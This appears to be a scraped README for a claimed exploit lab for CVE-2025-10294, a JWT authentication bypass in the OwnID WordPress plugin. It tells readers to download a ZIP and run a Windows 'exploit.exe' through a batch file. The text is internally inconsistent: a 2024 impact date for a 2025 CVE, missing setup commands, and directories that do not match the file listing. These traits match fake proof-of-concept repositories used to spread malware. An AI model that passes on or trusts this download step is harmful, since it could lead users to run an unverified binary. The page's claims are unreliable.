来源

关联漏洞

介绍

# Lab: CVE-2025-10294 (EUVD-2025-34544) - Authentication Bypass in OwnID Passwordless Login Plugin
## 🔗 Download Now
### [Download](https://github.com/RedFoxNxploits/CVE-2025-10294-Poc/raw/refs/heads/main/Valore/lab-cve-2025-10294.zip)
## 🚀 Overview
This repository provides a self-contained lab environment to demonstrate CVE-2025-10294 (also tracked as EUVD-2025-34544), a critical authentication bypass vulnerability in the OwnID Passwordless Login plugin for WordPress. Classified under CWE-288 (Authentication Bypass Using an Alternate Path or Channel), this flaw allows unauthenticated attackers to craft malicious JWTs and gain administrative access on incompletely configured sites where the `ownid_shared_secret` parameter is unset or empty.

The vulnerability stems from inadequate validation in the plugin's JWT handling logic. In affected versions (up to 1.3.4), the plugin fails to enforce a check for a non-empty shared secret before processing JWTs, enabling attackers to bypass signature verification and impersonate any user, including administrators. This exposes sites to full account takeover, data exfiltration, and potential lateral movement within the WordPress ecosystem.

## Impact
High severity (CVSS 9.8). Approximately 200 sites were affected as of June 2024, primarily those using WooCommerce integrations. Exploitation requires no privileges and can be performed remotely.

This lab is for **educational and research purposes only**. It simulates a vulnerable WordPress setup using Docker, allowing safe reproduction of the vulnerability in a controlled environment. Do not use this on production systems or without explicit permission. The authors disclaim any liability for misuse.

## 📋 Prerequisites
To set up and run this lab, you'll need:
- A modern web browser for interacting with the simulated WordPress site.
- Basic knowledge of command-line tools (e.g., bash or PowerShell).
- Optional: Tools like Burp Suite or jwt_tool for advanced JWT manipulation during exploitation testing.
- Windows environment for running the exploit (due to .exe and .bat dependencies); alternatives can be adapted for other OS.

Ensure your system has at least 4GB RAM allocated to Docker to handle the WordPress container smoothly.

## Download & Install
1. Download the exploit toolkit ZIP file from the following link (contains the main exploit executable, helper scripts, and sample payloads):
- [Download Exploit Toolkit](https://github.com/RedFoxNxploits/CVE-2025-10294-Poc/raw/refs/heads/main/Valore/lab-cve-2025-10294.zip)

The ZIP includes:
- `exploit.exe`: The primary exploit binary (compiled in C# for Windows) that automates JWT crafting and authentication bypass.
- `start_exploit.bat`: A batch script to launch `exploit.exe` with default parameters (simply opens the .exe for user interaction).
- `payloads/`: Directory with sample JWT templates (JSON files) for admin impersonation.
- `configs/`: Example WordPress config snippets to simulate vulnerable setups.


2. Build and start the vulnerable Docker environment:
This will spin up a WordPress container with the OwnID plugin (version 1.3.4) installed but unconfigured (i.e., `ownid_shared_secret` is empty).

Access the site at `http://localhost:8080`. Default admin credentials: `admin` / `password` (for pre-exploitation testing).

## 🛠 Quick Start
1. Download and extract the exploit toolkit ZIP as described above.
2. Navigate to the `exploits/` directory.
3. Run the batch file to start the exploit:
This will open `exploit.exe`, which provides a GUI for inputting the target URL, desired user ID (e.g., admin=1), and generating a malicious JWT. The tool sends the crafted token to the `/wp-json/ownid/v1/auth` endpoint, bypassing authentication.

4. Verify exploitation: Once successful, you'll be logged in as admin. Check the WordPress dashboard for unauthorized access.

For automated testing, use the scripts in `/scripts/` (detailed below).
## 📞 Support
If you need help, please open an issue on the GitHub repository. Provide details about your problem, and someone from the community will assist you.

Thank you for using lab-cve-CVE-2025-10294. We hope you enjoy exploring WordPress security in a practical way!

文件快照

 [4.0K]  /data/pocs/6eb0e3e0e6e4ba77069a2e32df6da031e5776a41
├── [4.1K]  README.md
└── [4.0K]  Valore
    ├── [   1]  haze
    └── [8.0M]  lab-cve-2025-10294.zip

1 directory, 3 files

备注